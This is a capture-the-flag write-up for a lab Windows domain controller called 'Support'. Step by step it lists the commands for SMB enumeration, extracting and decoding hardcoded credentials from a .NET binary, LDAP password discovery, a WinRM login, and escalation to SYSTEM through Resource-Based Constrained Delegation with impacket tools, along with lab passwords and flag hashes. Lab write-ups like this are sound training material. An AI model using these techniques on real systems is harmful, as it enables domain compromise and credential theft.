Overview
Support is an Easy Windows machine simulating an Active Directory Domain Controller. The attack chain involves SMB enumeration, .NET binary analysis, credential decryption, LDAP enumeration, and privilege escalation via Resource-Based Constrained Delegation (RBCD).
Reconnaissance
Host Discovery
ping -c 1 10.129.X.X
ttl=127 → Indicates Windows host
Port Scanning
nmap -sS -p- --open --min-rate 5000 -Pn -n 10.129.X.X
53 (DNS), 88 (Kerberos), 389 (LDAP), 445 (SMB), 5985 (WinRM)
SMB Enumeration
smbclient -L //10.129.X.X -N
support-tools → Non-standard share (interesting)
smbclient //10.129.X.X/support-tools -N
get UserInfo.exe.zip
Binary Analysis
unzip UserInfo.exe.zip
strings -e l UserInfo.exe
Encrypted password: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E
Key: armando
User: support\ldap
Password Decryption
Password was XOR + Base64 encoded.
Decrypted password:
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP Enumeration
ldapsearch -x -H ldap://10.129.X.X \
-D 'support\ldap' \
-w 'password'
support user password found:
Ironside47pleasure40Watchful
Initial Access (WinRM)
evil-winrm -i 10.129.X.X -u support -p Ironside47pleasure40Watchful
Access as support user obtained
User Flag: 90ff758144e77feda1f79734e57b8abf
Privilege Escalation (RBCD)
The user belongs to a group with GenericAll permissions over the Domain Controller, allowing a Resource-Based Constrained Delegation attack.
impacket-addcomputer support.htb/support:'password'
Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount FAKE$
impacket-getST support.htb/FAKE$ -impersonate Administrator
impacket-psexec -k -no-pass support.htb/Administrator
SYSTEM access obtained
Root Flag: d0b25369aadbc499f993e59be095b5ee
Summary
- SMB → Anonymous share access
- Binary → Hardcoded encrypted credentials
- XOR → Password decryption
- LDAP → Password disclosure
- WinRM → Initial foothold
- RBCD → Privilege escalation to SYSTEM